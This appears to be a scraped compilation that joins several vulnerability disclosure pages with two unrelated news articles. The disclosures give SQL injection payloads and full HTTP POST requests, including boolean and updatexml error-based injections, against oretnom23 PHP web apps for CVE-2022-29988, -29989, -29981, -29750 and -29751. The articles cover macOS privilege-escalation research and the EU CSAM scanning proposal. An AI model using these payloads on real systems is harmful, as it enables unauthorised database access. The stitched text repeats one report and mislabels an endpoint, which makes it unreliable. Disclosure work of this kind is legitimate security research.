Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via \scbs\classes\Master.php?f=delete.

Permalink

Cannot retrieve contributors at this time

**Online Sports Complex Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html

Vulnerability File: \\scbs\\classes\\Master.php?f=delete

Vulnerability location: /scbs/classes/Master.php?f=delete, id

Current database name: scbs\_db,length is 7

\[+\] Payload: 11' and length(database()) = 7--+

POST /scbs/classes/Users.php?f\=delete HTTP/1.1
Host: 192.168.1.19
Content\-Length: 37
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/scbs/admin/?page=user/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=p5eujbkhl692v4hpr6ltptnq06
Connection: close
id=11' and length(database()) = 7--+  // Leak place ---> id

When length (database ()) = 6, Content-Length: 269

When length (database ()) = 7, Content-Length: 19

CVE-2022-29988: bug_report/SQLi-4.md at main · k0xx11/bug_report

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via \scbs\classes\Master.php?f=delete_booking.

Permalink

Cannot retrieve contributors at this time

**Online Sports Complex Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html

Vulnerability File: \\scbs\\classes\\Master.php?f=delete\_booking

Vulnerability location: /scbs/classes/Master.php?f=delete\_booking, id

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

POST /scbs/classes/Master.php?f\=delete\_booking HTTP/1.1
Host: 192.168.1.19
Content\-Length: 65
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/scbs/admin/?page=bookings
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=p5eujbkhl692v4hpr6ltptnq06
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-29989: bug_report/SQLi-3.md at main · k0xx11/bug_report

Simple Client Management System 1.0 is vulnerable to SQL Injection via /cms/classes/Users.php?f=delete.

Permalink

Cannot retrieve contributors at this time

**Simple-Client-Management-System v1.0 by oretnom23 has SQL injection**

**Author：** k0xx

vendors: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

Vulnerability File: /cms/classes/Users.php?f=delete

Vulnerability location: /cms/classes/Users.php?f=delete,id

\[+\] Payload: id=11' and length(database()) =6 --+ // Leak place ---> id

Current database name: cms\_db,length is 6

POST /cms/classes/Users.php?f\=delete HTTP/1.1
Host: 192.168.1.19
Content\-Length: 36
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/cms/admin/?page=user/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5u3dthmlo3ajo2g7k8pfvb4g8h
Connection: close
id=11' and length(database()) =6 --+ // Leak place ---> id

When length (database ()) = 6, Content-Length: 19 

When length (database ()) = 7, Content-Length: 168

CVE-2022-29981: bug_report/SQLi-8.md at main · k0xx11/bug_report

Permalink

**Simple-Client-Management-System v1.0 by oretnom23 has SQL injection**

**Author：** k0xx

vendors: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

Vulnerability File: /cms/classes/Users.php?f=delete

Vulnerability location: /cms/classes/Users.php?f=delete,id

\[+\] Payload: id=11' and length(database()) =6 --+ // Leak place ---> id

Current database name: cms\_db,length is 6

POST /cms/classes/Users.php?f\=delete HTTP/1.1
Host: 192.168.1.19
Content\-Length: 36
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/cms/admin/?page=user/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5u3dthmlo3ajo2g7k8pfvb4g8h
Connection: close
id=11' and length(database()) =6 --+ // Leak place ---> id

When length (database ()) = 6, Content-Length: 19 

When length (database ()) = 7, Content-Length: 168

Simple Client Management System 1.0 is vulnerable to SQL Injection via /cms/classes/Master.php?f=delete_service.

Permalink

Cannot retrieve contributors at this time

**Simple-Client-Management-System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

Vulnerability File: /cms/classes/Master.php?f=delete\_service

Vulnerability location: /cms/classes/Master.php?f=delete\_service, id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /cms/classes/Master.php?f\=delete\_service HTTP/1.1
Host: 192.168.1.19
Content\-Length: 65
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/cms/admin/?page=maintenance/services
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5u3dthmlo3ajo2g7k8pfvb4g8h
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-29750: bug_report/SQLi-3.md at main · k0xx11/bug_report

Simple Client Management System 1.0 is vulnerable to SQL Injection via /cms/classes/Master.php?f=delete_client.

Permalink

Cannot retrieve contributors at this time

**Simple-Client-Management-System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

Vulnerability File: /cms/classes/Master.php?f=delete\_client

Vulnerability location: /cms/classes/Master.php?f=delete\_client, id

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /cms/classes/Master.php?f\=delete\_client HTTP/1.1
Host: 192.168.1.19
Content\-Length: 61
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/cms/admin/?page=client
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5u3dthmlo3ajo2g7k8pfvb4g8h
Connection: close
id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),0)--+ // Leak place ---> id

CVE-2022-29751: bug_report/SQLi-5.md at main · k0xx11/bug_report

Researcher shares how he unearthed newer bugs in Apple's operating system by closer scrutiny of previous research, including vulnerabilities that came out of the Pwn2Own competition.

Sometimes all it takes to root out a new software vulnerability is to study and analyze previous bug reports. That's how researcher Csaba Fitzl says he sniffed out some new Apple macOS vulnerabilities, one of which was a mirror image of a logic flaw that a group of researchers competing in the 2020 Pwn2Own contest found and executed there.

Fitzl, a content developer for Offensive Security, says he reread and studied the winning six-exploit chain that the researchers used to hack macOS. One of the exploits in that chain weaponized a privilege escalation bug, which Apple later fixed. But there still was a hole, and he found it: "Although Apple fixed it properly, but still there was an extra function ... that basically opened up another vulnerability to be utilized a bit differently than the original one," Fitzl explains.

Apple's original fix for the flaw allowed an attacker to change ownership of a directory in macOS. But Fitzl discovered that he could create a new directory on the targeted system, which could allow an attacker to escalate their privileges on macOS. "Although you had to use different techniques to get through to the system, but because you could create an arbitrary directory anywhere on the system, you could elevate your privileges to root," he says.

It was basically the same logic flaw but in a different piece of the code. Apple has since patched the vulnerability Fitzl found as well.

This week at Black Hat Singapore, Fitzl will share technical details of this and two other vulns he found while drilling down on previous vuln research on macOS during a session entitled "macOS Vulnerabilities Hiding in Plain Sight."

Apple had not responded to a request for comment as of this posting.

**'Something Is Not Right'  
**Fitzl says he didn't actually spot traces of the new flaws linked to previous research until after he reread the research papers. "At some point it hit me that there is something not right. It turned out that there is a vulnerability not like the one initially documented," he explains of his findings. "That eventually led to me to find or identify new vulnerabilities."

The other two flaws he found include one that built upon research from Mickey Jin, who discovered a bypass for an Apple patch for the so-called XCSSET malware that targeted Apple's built-in Transparency, Consent, and Control (TCC) privacy and security framework. XCSSET pilfers sensitive user and developer information from applications on a Mac machine.

Fitzl says he noticed an underlying weakness in the TCC framework that would allow an attacker to bypass TCC. He consulted with fellow researcher Wojciech Regula, head of mobile security and principal security consultant at SecuRing, on the issue.

"We found that we can still generically bypass TCC because there was an inherent vulnerability" that came out of the previous research, he says. It was a flaw in TCC that could allow an attacker to bypass the macOS privacy and security framework.

While macOS relies heavily on code-signing and verification of code-signing, Fitzl explains, TCC was not verifying a process that was running but rather verifying binary code on the disk. "This allowed all these abuses by malware," he says. "So we just replaced the binary on the disk and that's it: We could bypass TCC again."

Apple has since fixed the issue, he says.

The third macOS vuln Fitzl found builds off a flaw used in a 2017 Pwn2Own macOS exploit chain: another privilege escalation flaw that Apple later patched in its disk arbitration framework to elevate to root access. Then Fitzl found that the new version of Apple's disk arbitration source code included the "exact same" logic bug that could lead to privilege escalation. "You could use the same logic bug to escape the \[macOS\] sandbox" that keeps applications from getting access to other parts of the machine they don't need, he says.

For example, an attacker could abuse the vulnerability to escape Safari's sandbox and gain broader access across the victim's machine.

**Protecting macOS  
**Fitzl recommends that organizations religiously update their Macs with the latest versions of macOS to keep their endpoints protected from attacks such as these. They should also run anti-malware and endpoint detection and response on their machines.

Known macOS Vulnerabilities Led Researcher to Root Out New Flaws

The European Commission on Wednesday proposed new regulation that would require tech companies to scan for child sexual abuse material (CSAM) and grooming behavior, raising worries that it could undermine end-to-end encryption (E2EE).
To that end, online service providers, including hosting services and communication apps, are expected to proactively scan their platforms for CSAM as well as

The European Commission on Wednesday proposed new regulation that would require tech companies to scan for child sexual abuse material (CSAM) and grooming behavior, raising worries that it could undermine end-to-end encryption (E2EE).

To that end, online service providers, including hosting services and communication apps, are expected to proactively scan their platforms for CSAM as well as report, remove and disable access to such illicit content.

While instant messaging services like WhatsApp already rely on hashed versions of known CSAM to automatically block new uploads of images or videos matching them, the new plan requires such platforms to identify and flag new instances of CSAM.

"Detection technologies must only be used for the purpose of detecting child sexual abuse," the regulator said. "Providers will have to deploy technologies that are the least privacy-intrusive in accordance with the state of the art in the industry, and that limit the error rate of false positives to the maximum extent possible."

A new EU Centre on Child Sexual Abuse, which will be independently established to enforce the measures, has been tasked with maintaining a database of digital "indicators" of child sexual abuse, in addition to processing and forwarding legitimate reports for law enforcement action.

In addition, the rules require app stores to ensure that children are refrained from downloading apps that "may expose them to a high risk of solicitation of children."

The controversial proposal to clamp down on sexual abuse material comes days after a draft version of the regulation leaked earlier this week, prompting Johns Hopkins University security researcher Matthew Green to state that "This is Apple all over again."

The tech giant, which last year announced plans to scan and detect CSAM on its devices, has since delayed the rollout to "take additional time over the coming months to collect input and make improvements."

Meta, likewise, has postponed its plans to support E2EE across all its messaging services, WhatsApp, Messenger, and Instagram, until sometime in 2023, stating that it's taking the time to "get this right."

A primary privacy and security concern arising out of scanning devices for illegal pictures of sexual abuse is that the technology could weaken privacy by creating backdoors to defeat E2EE protections and facilitate large-scale surveillance.

This would also necessitate persistent plain-text access to users' private messages, effectively rendering E2EE incompatible and eroding the security and confidentiality of the communications.

"The idea that all the hundreds of millions of people in the E.U. would have their intimate private communications, where they have a reasonable expectation that that is private, to instead be kind of indiscriminately and generally scanned 24/7 is unprecedented," Ella Jakubowska, a policy advisor at European Digital Rights (EDRi), told Politico.

But the privacy afforded by encryption is also proving to be a double-edged sword, with governments increasingly fighting back over worries that encrypted platforms are being misused by malicious actors for terrorism, cybercrime, and child abuse.

"Encryption is an important tool for the protection of cybersecurity and confidentiality of communications," the commission said. "At the same time, its use as a secure channel could be abused of by criminals to hide their actions, thereby impeding efforts to bring perpetrators of child sexual abuse to justice."

The development underscores Big Tech's ongoing struggles to balance privacy and security while also simultaneously addressing the need to assist law enforcement agencies in their quest for accessing criminal data.

"The new proposal is over-broad, not proportionate, and hurts everyone's privacy and safety," the Electronic Frontier Foundation (EFF) said. "The scanning requirements are subject to safeguards, but they aren't strong enough to prevent the privacy-intrusive actions that platforms will be required to undertake."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apple